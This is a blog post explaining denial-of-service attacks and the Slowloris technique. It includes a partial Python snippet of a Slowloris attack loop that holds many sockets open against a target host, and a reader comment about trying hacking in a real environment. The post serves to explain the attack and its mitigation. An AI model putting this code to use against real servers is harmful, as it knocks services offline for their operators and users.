loading image... Gichuki P Mwangi

DDoS Attack!

A cyber attack on a machine can have catastrophic repercussions! This is not limited to simple machines, no. Every single machine is vulnerable in one way or another – just takes a small lapse in security. Cyber attacks can bring a business to its knees, and stop operations of sophisticated governments. Some of these attacks require massive resources but some, some are just simple and very effective. They require a single, normal computer. Nothing more. Read on as the slow loris DoS Attack is unmasked.

DISCLAIMER! : Please do not try using the code on this website to perform any kind of attack, you could potentially land in trouble – and I won’t be there to help.

DoS is an abbreviation for Denial of Service. This is a type of cyber attack that an attacker performs with the intention of making a machine or network reource unavailable to users who are intended to use it by either temporarily or permanently disrupting the services of the host machine connected to the internet. To achieve this kind of an attack, the attacker (hacker) intentionally sends many, repetitive requests thus flooding the host system with requests. Since the system takes all these requests as though they were valid HTTPS requests, it processes them. All other requests placed after these requests are put in waiting for a definite or indefinite amount of time. This kind of attack can be implemented with one computer.

There are time when the attacker may have access to more than one computer either legally or illegaly. In this case, they can cause the sending of requests simultaneously, in a controlled fashion from all these computers to the same host. This kind of an attack is called a Distributed Denial of Service (DDoS) attack. The term DDoS and DoS are normally interchanged in usage but it is important to differentiate.

To understand how it works, visualize this analogy.
You have a party and you invite about 100 people. Of these 100 people, 5 are VIPs, 95 are normal guests. You have one door to the room where the party is being held and everyone is set to start arriving at 9pm. The regular folks invited to the party learn about the VIP list and swear to inconvenience them. Some minutes to 9pm, they get to the party and crowd in the VIPs section and refuse to exit. Where shall your VIPs sit? They have to wait for you to evict the regular folks or walk away from the party.

DoS attacks have been easily fixed, and that is because the problem has been in existence for quite some time now. There are three ways of fixing a normal DoS attack;
☛ Blocking an IP address based on the amount of http requests.
☛ Blocking an IP address based on the velocity of http requests.
☛ Blocking an IP address based on the amount of status codes generated.

A distributed DoS is harder to defend against but still, very much preventable. The difficulty arises from the fact that the machines attacking a host are located in various different areas in a region or in the world. Again, the attacks are known and as such, there are many out of the box solutions implemented for defense.

Implementing such normal DoS / DDoS attacks is not really viable and that is why, the SlowLoris is all too interesting due to how it works. A slow loris attack can either be DoS or DDoS.

It works by exploting poor network connectivity handling by the server. This is the reason why it is quite difficult to mitigate. There is a solution and we’ll get to that in a moment. There are definitely areas where network connection is interrupted oftenly. It could be an underground tunnel or an open area where the network signal is weak. The server needs to take into account such cases and ensure that no one is really blocked from website access dues to network related issues. That is where the exploit is acquired.

For each HTTP request, there are characters that signify its begining and its end. Once you send a request, you typically tell the server that your request has ended at some point using these special characters. If you send a request and you don’t send the characters signifying the end of that request, you normally get a server timeout response, so that you don’t hold up resources that are otherwise needed by someone else. To make use of the exploit, SlowLoris sends a valid HTTP request and then sends a few bits every few seconds (and indefinitely) but never sends the characters dictating the end of the HTTP request. Thus, the server does not give a timeout and keeps waiting for the request being sent to complete. Take note that the resource being used to process this request shall not be released for an indefinite amount of time.

Unlike other DDoS / DoS attacks, SlowLoris does not use a lot of bandwidth. In fact, it uses a very small amount of it repetitively with the aim of using up server resources with HTTP requests that seem valid but very slow. In this respect, the server is never able to release any open partial connections because it is waiting for the completion of a request (s).
Below is a snippet of a SlowLoris code in Python. I have borrowed it for GitHub and you can visit it to get the full code.

Code Snippet.


def main():
ip = args.host
socket_count = args.sockets
logging.info(“Attacking %s with %s sockets.”, ip, socket_count)
logging.info(“Creating sockets…”)
for _ in range(socket_count):
try:
logging.debug(“Creating socket nr %s”, _)
s = init_socket(ip)
except socket.error:
break
list_of_sockets.append(s)
while True:
try:
logging.info(“Sending keep-alive headers… Socket count: %s”, len(list_of_sockets))
for s in list(list_of_sockets):
try:
s.send(“X-a: {}\r\n”.format(random.randint(1, 5000)).encode(“utf-8”))
except socket.error:
list_of_sockets.remove(s)
for _ in range(socket_count – len(list_of_sockets)):
logging.debug(“Recreating socket…”)
try:
s = init_socket(ip)
if s:
list_of_sockets.append(s)
except socket.error:
break
time.sleep(15)
except (KeyboardInterrupt, SystemExit):
print(“\nStopping Slowloris…”)
break
if __name__ == “__main__”:
main()

Obviously I have left quite a chunck of code out of the snippet but you can view it on GitHub.
To mitigate the attack, you need to have some code inserted in your server configuration and luckily, your website host has most definitely done the relevant configurations for you, you need not worry at all.

Gichuki P. Mwangi

A computer scientist with a passion to solve real world, day to day problems using new computer technologies and those already in existence.

2 thoughts to “DDoS Attack!”

  1. I really would like to know more about hacking and test it in a real environment. I will checkout the code on Github.
    Thanks for the article.

Leave a Reply

Your email address will not be published. Required fields are marked *